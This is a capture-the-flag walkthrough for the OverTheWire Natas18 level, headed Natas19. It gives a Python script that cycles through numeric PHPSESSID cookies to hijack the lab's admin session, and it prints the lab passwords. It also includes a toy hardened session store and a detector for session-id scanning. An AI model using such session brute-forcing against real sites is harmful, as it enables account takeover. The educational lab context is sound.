Natas19
Website URL: http://overthewire.org/wargames/natas/natas19.html
According to the data on the OverTheWire webpage.
Username: natas19
URL: http://natas19.natas.labs.overthewire.org
Let’s log into the URL for Natas18

Look at the source code.


Reading the source code, it seems that the credentials are printed only if my_session_start() succeeds, and that function succeeds only when:
- The PHPSESSID cookie is set to a valid (numeric) value.
- A session can be started from that PHPSESSID.
- The $_SESSION variable has admin set to a non-zero value.
Now consider the else branch of the same condition, which runs by default (initially there is no PHPSESSID in the cookie). It creates a PHP session based on the username provided and starts the session. Note that this branch never looks at the password and never sets the admin flag to 1.
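To make the weakness concrete, here is a toy model (added here; it is not the level's PHP and not the author's code) that contrasts a session store built like the one just described, with small sequential numeric ids and no password check, against a hardened store that issues 256-bit random ids and records the admin flag only after the password is verified. The class and function names, the 640-id bound and the pre-seeded admin id 119 (both taken from later in this write-up) are assumptions for the demonstration.

```python
import hmac
import math
import secrets

# Constructed toy model (not the level's PHP): compares the session-id scheme
# this write-up exploits with a hardened one. All names here are assumptions.

WEAK_ID_SPACE = 640     # the write-up's observed bound on numeric PHPSESSID values
STRONG_ID_BYTES = 32    # 256 bits of randomness per id in the hardened store


class WeakSessionStore:
    """Sequential small-integer ids; any id that exists is accepted as-is."""

    def __init__(self, admin_sid="119"):
        # One pre-existing admin session, as on the level (id taken from the write-up).
        self.sessions = {admin_sid: {"username": "admin", "admin": 1}}
        self.next_id = 0

    def login(self, username, password):
        # Mirrors the else branch: password ignored, admin never granted here.
        sid = str(self.next_id % WEAK_ID_SPACE)
        self.next_id += 1
        self.sessions[sid] = {"username": username, "admin": 0}
        return sid

    def resolve(self, sid):
        # Only the "is it numeric?" check stands between a cookie and a session.
        return self.sessions.get(sid) if sid.isdigit() else None

    def id_space_bits(self):
        return math.log2(WEAK_ID_SPACE)


class HardenedSessionStore:
    """Unguessable ids; the password is checked before any privilege is recorded."""

    def __init__(self, users):
        self.users = users      # username -> password (constructed; store hashes in real code)
        self.sessions = {}

    def login(self, username, password):
        expected = self.users.get(username)
        if expected is None or not hmac.compare_digest(expected, password):
            return None         # no session at all on a failed login
        sid = secrets.token_urlsafe(STRONG_ID_BYTES)
        self.sessions[sid] = {"username": username, "admin": 1 if username == "admin" else 0}
        return sid

    def resolve(self, sid):
        return self.sessions.get(sid)

    def id_space_bits(self):
        return 8 * STRONG_ID_BYTES


def find_admin_session(store, guesses):
    """Try each candidate id; return the first one that resolves to an admin session, else None."""
    for sid in guesses:
        session = store.resolve(sid)
        if session and session.get("admin") == 1:
            return sid
    return None


if __name__ == "__main__":
    weak = WeakSessionStore()
    hard = HardenedSessionStore({"admin": "correct horse"})
    hard.login("admin", "correct horse")
    candidates = [str(i) for i in range(WEAK_ID_SPACE)]
    print("weak store, %.1f-bit ids:" % weak.id_space_bits(), find_admin_session(weak, candidates))
    print("hardened store, %d-bit ids:" % hard.id_space_bits(), find_admin_session(hard, candidates))
```

Walking the 640 candidates finds the seeded admin session in the weak store; the same loop finds nothing in the hardened store, and exhausting a 256-bit id space is not feasible, so the fix is the id generator plus the password check rather than any limit on guesses.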
Let's try logging in with dummy credentials for the admin user and intercept the POST request.

Let’s have a look at the intercepted request.

The request is passed with PHPSESSID set to 169 and username set to admin. Let's now switch to the cookie-based logic. First, we set PHPSESSID to 169 in the cookie.

Then, to check whether we are on the right branch of the code, let's get into debug mode by appending ?debug to the URL.

Looks like we got into the right branch. Now, all that is left is to set $_SESSION["admin"] = 1. However, $_SESSION is a server-side variable; we cannot access it directly. It is set as part of the session, and which session we get is decided by the PHPSESSID in the cookie.
In order to get an admin session, we need to manually set PHPSESSID to the exact value of the admin session. Although we don't yet know the admin session ID, we can see that there are at most 640 possible values. Let's whip up a script to try all of them and find the admin PHPSESSID.
import requests
from requests.auth import HTTPBasicAuth

def main():
    # HTTP basic auth for the level itself (natas18 credentials)
    Auth = HTTPBasicAuth('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
    Data = {'username': 'admin', 'password': 'admin', 'admin': '1'}
    # PHPSESSID is numeric and bounded by 640, so walk every candidate
    for i in range(0, 640):
        cookie = {'PHPSESSID': str(i)}
        r = requests.get("http://natas18.natas.labs.overthewire.org/index.php?debug",
                         params=Data, auth=Auth, cookies=cookie)
        # Every non-admin session prints "logged in as a regular user";
        # the first id that does not is the admin session
        if "logged in as a regular user" not in r.text:
            print("Admin: ", i)
            break

if __name__ == '__main__':
    main()
Let’s run it. It’ll take about 2-3 minutes.

So the admin session ID is 119. Let's set it in the cookie and view the response.
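From the server's side, a scan like the one just run is easy to spot: one client presenting many different PHPSESSID values within a short time. The following detector (added here; it is not part of the write-up) parses constructed access-log lines in an assumed custom format that records the Cookie header, and flags any client that cycles through more than five session ids within sixty seconds. The log format, the field names, the thresholds and the sample addresses are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed custom access-log format (constructed for this example):
#   <client ip> [<timestamp>] "<request line>" <status> "<Cookie header>"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)
SID_RE = re.compile(r'PHPSESSID=([^;\s]+)')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one client walks ids 0..6 one second apart, another
# client makes two ordinary requests with a single fixed session id.
SAMPLE_LOG = [
    f'198.51.100.7 [10/Oct/2023:12:00:{i:02d} +0000] "GET /index.php?debug HTTP/1.1" 200 "PHPSESSID={i}"'
    for i in range(7)
] + [
    '203.0.113.5 [10/Oct/2023:12:00:03 +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=169; theme=dark"',
    '203.0.113.5 [10/Oct/2023:12:00:09 +0000] "POST /index.php HTTP/1.1" 200 "PHPSESSID=169; theme=dark"',
    'garbage line that does not parse',
]


def parse_line(line):
    """Return {ip, ts, sid, status} for a well-formed line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    sid_m = SID_RE.search(m["cookie"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "sid": sid_m.group(1) if sid_m else None,
        "status": int(m["status"]),
    }


def detect_session_cycling(lines, window_seconds=60, max_distinct=5):
    """Return {ip: peak number of distinct PHPSESSID values seen inside one window}
    for every client that exceeds max_distinct distinct ids within window_seconds."""
    events = [e for e in map(parse_line, lines) if e and e["sid"] is not None]
    events.sort(key=lambda e: e["ts"])
    windows = defaultdict(deque)      # per client: sliding window of (ts, sid)
    alerts = {}
    for e in events:
        win = windows[e["ip"]]
        win.append((e["ts"], e["sid"]))
        # drop events that fell out of the window
        while (e["ts"] - win[0][0]).total_seconds() > window_seconds:
            win.popleft()
        distinct = {sid for _, sid in win}
        if len(distinct) > max_distinct:
            alerts[e["ip"]] = max(alerts.get(e["ip"], 0), len(distinct))
    return alerts


if __name__ == "__main__":
    for ip, count in detect_session_cycling(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {count} distinct PHPSESSID values inside one window")
```

A legitimate client keeps one session id for the life of its session, so a high distinct-id count per client is a strong signal; the same counter also works as a rate-limit key, and pairing it with the random session ids from the earlier example removes the reason to scan in the first place.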

Done!
Password for next level: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs